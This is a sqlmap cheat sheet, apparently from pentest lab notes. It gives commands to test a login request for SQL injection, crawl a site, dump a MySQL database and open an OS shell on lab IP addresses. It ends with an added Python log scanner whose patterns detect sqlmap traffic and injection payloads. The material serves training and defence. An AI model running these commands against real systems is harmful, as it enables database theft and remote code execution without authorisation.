SQLMap

Run SQLMap against a login page

  • Browse to the login page while proxying with Burp

  • Enter some bogus credentials and intercept the request

  • Copy the request from Burp

  • Create a file with this request data

  • Remove the empty lines

sed -i '/^\s*$/d' <file name>

  • Run SQLMap and pass this file to it

sqlmap -r <file name> --level 5 --risk 3

--batch

  • sqlmap won't prompt you for any input

The --crawl option makes sqlmap enumerate the pages of a web application, starting from the base URL, and automatically test them for SQL injection vulnerabilities.

sqlmap -u <base url> --crawl=1

sqlmap -u http://10.11.15.64 --crawl=1

Dump the database

sqlmap -u "http://10.11.1.35/comment.php?id=738" --dbms=mysql --dump --threads=5

Spawn a shell with sqlmap

sqlmap -u "http://10.11.1.35/comment.php?id=738" --dbms=mysql --os-shell
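
For the defender's side of the commands above, here is an added example (not part of the original notes) that scans web access logs for traces of a sqlmap run: the tool's default User-Agent and common injection patterns in the query string. The log lines, IP addresses and sqlmap version string are constructed samples, and the `scan` function and rule names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not from a real system).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.0.2.66 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=738%20AND%204521%3D4521 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.0.2.77 - - [01/Jan/2024:10:00:02 +0000] "GET /comment.php?id=738%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.77 - - [01/Jan/2024:10:00:03 +0000] "GET /comment.php?id=738%27%20AND%20SLEEP(5)--%20x HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# client IP, request line, status, size, referer, user agent
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
                  r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
UA_RE = re.compile(r"^sqlmap/", re.I)  # sqlmap's default User-Agent prefix
PAYLOAD_RE = re.compile(
    r"\bunion\s+(all\s+)?select\b|\bsleep\s*\(|\bbenchmark\s*\(|\b(and|or)\s+\d+\s*=\s*\d+",
    re.I)

def scan(log_text):
    """Return (findings, hits_per_ip); findings are (ip, uri, reasons) tuples."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        reasons = []
        if UA_RE.match(m["ua"]):
            reasons.append("sqlmap-user-agent")
        # URL-decode the query string so encoded payloads match the patterns
        query = unquote_plus(m["uri"].partition("?")[2])
        if PAYLOAD_RE.search(query):
            reasons.append("sqli-pattern-in-query")
        if reasons:
            findings.append((m["ip"], m["uri"], reasons))
            per_ip[m["ip"]] += 1
    return findings, per_ip

if __name__ == "__main__":
    hits, counts = scan(SAMPLE_LOG)
    for ip, uri, reasons in hits:
        print(ip, ",".join(reasons), uri)
    print(dict(counts))
```

The User-Agent header is client-controlled, so treat that rule as a convenience and rely on the payload rule. POST bodies such as the login request do not appear in access logs and need WAF or application-level logging to inspect.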
